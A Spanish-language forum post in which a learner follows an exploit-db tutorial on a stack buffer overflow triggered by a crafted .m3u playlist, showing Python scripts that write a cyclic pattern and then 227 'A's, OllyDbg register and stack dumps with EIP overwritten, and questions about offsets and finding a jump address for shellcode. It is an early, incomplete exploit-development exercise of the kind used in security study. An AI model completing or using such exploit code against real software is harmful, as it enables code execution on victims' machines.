Estoy siguiendo un "paper" y quería que me resolvierais algunas dudas que tengo.
Paper: http://www.exploit-db.com/download_pdf/17971
Os posteo el histórico que he hecho.
creo un script en python para que genere un archivo .m3u
Código:
Código:
buffer =
payload = (buffer)
f = open("Exploit.m3u","wb")
f.write(payload)
f.close()
Código:
Código:
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
payload = (buffer)
f = open("Exploit.m3u","wb")
f.write(payload)
f.close()
Con Ollydbg abro el archivo causando un desbordamiento:
Código:
Código:
CPU - main thread
EAX 00000000
ECX 00000000
EDX 001220B0 ASCII "C:\Users\cprados\Desktop\exploit\Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A
EBX 0038B658 ASCII "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7A
ESP 001221B8 ASCII "Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4A
EBP 000003E9
ESI 00122990 ASCII "C:\Users\cprados\Desktop\exploit\Exploit.m3u"
EDI 000003E8
EIP 36684135
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(4000)
T 0 GS 0000 NULL
D 0
O 0 LastErr 00000000 ERROR_SUCCESS
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 1.9909870777517070580e+1958
ST1 empty -2.9727283095472006590e-1400
ST2 empty 9.1910189915361154180e+2175
ST3 empty +UNORM 145F 0BA568B6 FA5EEA55
ST4 empty -1.9778078459257461330e-656
ST5 empty 1.2054646051545530210e+616
ST6 empty 1.0000000000000000000
ST7 empty 22.000000000000000000
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
Last cmnd 001B:76D1EC2A msvcrt.76D1EC2A
XMM0 00000000 00000000 00000000 00000000
XMM1 437984EC 66EF3DF2 CB1BEEFF 8C267657
XMM2 ED3EE9DB FB1A9069 9795720B FD1C8C47
XMM3 67839EC8 8E3B1C5C 2CD66001 3F5CD3EE
XMM4 1A014E73 BF9FF4DA B1A9F74D 39E90125
XMM5 5F38FD76 69B87053 30B4A6C2 CE27E325
XMM6 470B8912 21C0E7A4 E3B1A8C3 1A82EC9B
XMM7 19FC0166 BFBCD0C4 3B21C6ED D37B00F5
P U O Z D I
MXCSR 00001F80 FZ 0 DZ 0 Err 0 0 0 0 0 0
Rnd NEAR Mask 1 1 1 1 1 1
Ahora calculo el tamaño exacto que sobreescribe la pila con pattern_offset del EIP 36684135.
El resultado es 227 por lo que modifico el script de nuevo quedando así:
Código:
Código:
buffer = "A" * 227
payload = (buffer)
f = open("Exploit.m3u","wb")
f.write(payload)
f.close()
Código:
Código:
CPU - main thread
EAX 00000000
ECX 00000000
EDX 001220B0 ASCII "C:\Users\cprados\Desktop\exploit\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 00029CC0 ASCII 41,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
ESP 001221B8
EBP 000000E4
ESI 00122990 ASCII "C:\Users\cprados\Desktop\exploit\Exploit.m3u"
EDI 000000E3
EIP ABABABBA
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr 00000000 ERROR_SUCCESS
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty -??? FFFF 00000000 00000000
ST1 empty -??? FFFF 00FF00FF 00FF00FF
ST2 empty -??? FFFF 00000000 00000000
ST3 empty -??? FFFF 00B200C3 00E700F9
ST4 empty -NAN FFFF B3C4E8FA FF787878
ST5 empty -??? FFFF 00B300C4 00E800FA
ST6 empty 1.0000000000000000000
ST7 empty 22.000000000000000000
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
Last cmnd 001B:76D1EC2A msvcrt.76D1EC2A
XMM0 00000000 00000000 00000000 00000000
XMM1 00000000 00000000 00000000 00000000
XMM2 00000000 00000000 00000000 00000000
XMM3 00000000 00000000 00000000 26000000
XMM4 61007200 70006300 00000000 00000000
XMM5 00003100 4E001600 00007300 6F006400
XMM6 706F746B 73654400 11000000 00000000
XMM7 00000000 000000BE EF000400 07003800
P U O Z D I
MXCSR 00001F80 FZ 0 DZ 0 Err 0 0 0 0 0 0
Rnd NEAR Mask 1 1 1 1 1 1
Código:
Código:
CPU Stack
Address Value ASCII Comments
001221B8 ABABABAB ««««
001221BC EEFEEEAB «îþî
001221C0 000000FE þ
001221C4 00122990 �) ; ASCII "C:\Users\cprados\Desktop\exploit\Exploit.m3u"
001221C8 00000003
001221CC 00000021 !
001221D0 75D3D3D6 ÖÓÓu ; kernel32.lstrcpyA
001221D4 00122B9D �+ ; ASCII "Exploit.m3u"
001221D8 75D3D429 )ÔÓu ; kernel32.lstrcatA
001221DC 00000000
001221E0 000002FC ü
001221E4 00000003
001221E8 00000021 !
001221EC 00000000
001221F0 000000E3 ã
001221F4 00000047 G
001221F8 7713DF26 &ßw ; RETURN from ntdll.RtlFillMemoryUlong to ntdll.7713DF26
001221FC 001222E0 à"
00122200 770DF0F2 òð
w ; RETURN from ntdll.770DF0BE to ntdll.770DF0F2
00122204 77122447 G$w ; RETURN from ntdll.7710481D to ntdll.77122447
00122208 0012A021 !*
0012220C 001B0000
00122210 00000000
00122214 00000000
00122218 001B0148 H
0012221C 000000E3 ã
00122220 41414141 AAAA
00122224 41414141 AAAA
00122228 41414141 AAAA
0012222C 41414141 AAAA
00122230 41414141 AAAA
00122234 41414141 AAAA
00122238 41414141 AAAA
0012223C 41414141 AAAA
00122240 41414141 AAAA
00122244 41414141 AAAA
00122248 41414141 AAAA
0012224C 41414141 AAAA
00122250 41414141 AAAA
00122254 41414141 AAAA
Entonces aqui vienen mis preguntas...
¿Por que EIP no se sobreescribe con "A", EIP ABABABBA ?
En el paper el tio usa 207 caracteres a diferencia de los 227 que me ha calculado el pattern_offset, ¿por que?
Luego comenta que con findjmp intenta encontrar direcciones válidas para hacer saltar luego a nuestra shellcode, no entiendo esta parte, es más no se que librería he de buscar...
De momento es todo porque no quiero seguir con el tuto sin aclarar estas cosas...
Disculpad por la chapa que os he dado y de nuevo disculpas si esto no va a aquí.
Gracias a todos.